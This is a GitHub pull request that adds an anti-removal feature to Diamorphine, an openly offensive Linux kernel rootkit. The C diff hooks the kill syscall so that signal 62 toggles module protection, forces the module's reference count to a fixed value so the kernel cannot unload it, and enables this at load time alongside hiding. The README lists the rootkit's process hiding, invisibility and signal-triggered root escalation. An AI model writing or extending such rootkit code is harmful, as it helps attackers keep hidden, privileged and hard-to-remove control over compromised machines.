Skip to content

Module protection #57

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
Cu63 wants to merge 2 commits into
base: master
Choose a base branch
from
Open

Module protection #57

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
c0669d3
Add module protection featuer
Cu63 Apr 24, 2026
608e9ad
fix mistakes
Cu63 Apr 24, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
8 changes: 7 additions & 1 deletion README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -10,6 +10,8 @@ Features

- Hide/unhide any process by sending a signal 31;

- Sending a signal 62(to any pid) protect module from delete_module system call;

- Sending a signal 63(to any pid) makes the module become (in)visible;

- Sending a signal 64(to any pid) makes the given user become root;
Expand Down Expand Up @@ -49,8 +51,9 @@ insmod diamorphine.ko
Uninstall
--

The module starts invisible, to remove you need to make it visible
The module starts invisible and protected, to remove you need to make it visible and unprotected
```
kill -62 0
kill -63 0
```

Expand Down Expand Up @@ -87,3 +90,6 @@ https://github.com/zizzu0/LinuxKernelModules/

Linux Rootkits: New Methods for Kernel 5.7+
https://xcellerator.github.io/posts/linux_rootkits_11/

LKM Refcount Change
https://cu63.github.io/linux/rootkits/LKM-refcount-change/
25 changes: 25 additions & 0 deletions diamorphine.c
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -300,6 +300,8 @@ tidy(void)

static struct list_head *module_previous;
static short module_hidden = 0;
static short module_protected = 0;

void
module_show(void)
{
Expand All @@ -315,6 +317,24 @@ module_hide(void)
module_hidden = 1;
}

void
module_protect(void)
{
atomic_t *p_ref_count = &THIS_MODULE->refcnt;

atomic_set(p_ref_count, 0x8163);
module_protected = 1;
}

void
module_unprotect(void)
{
atomic_t *p_ref_count = &THIS_MODULE->refcnt;

atomic_set(p_ref_count, 1);
module_protected = 0;
}

#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
asmlinkage long
hacked_kill(const struct pt_regs *pt_regs)
Expand Down Expand Up @@ -345,6 +365,10 @@ hacked_kill(pid_t pid, int sig)
if (module_hidden) module_show();
else module_hide();
break;
case SIGPROTECT:
if (module_protected) module_unprotect();
else module_protect();
break;
default:
#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
return orig_kill(pt_regs);
Expand Down Expand Up @@ -414,6 +438,7 @@ diamorphine_init(void)
#endif

module_hide();
module_protect();
tidy();

#if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0)
Expand Down
7 changes: 7 additions & 0 deletions diamorphine.h
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -15,6 +15,12 @@ give_root(void);
void
module_show(void);

void
module_protect(void);

void
module_unprotect(void);

void
module_hide(void);

Expand Down Expand Up @@ -42,6 +48,7 @@ enum {
SIGINVIS = 31,
SIGSUPER = 64,
SIGMODINVIS = 63,
SIGPROTECT = 62,
};

#ifndef IS_ENABLED
Expand Down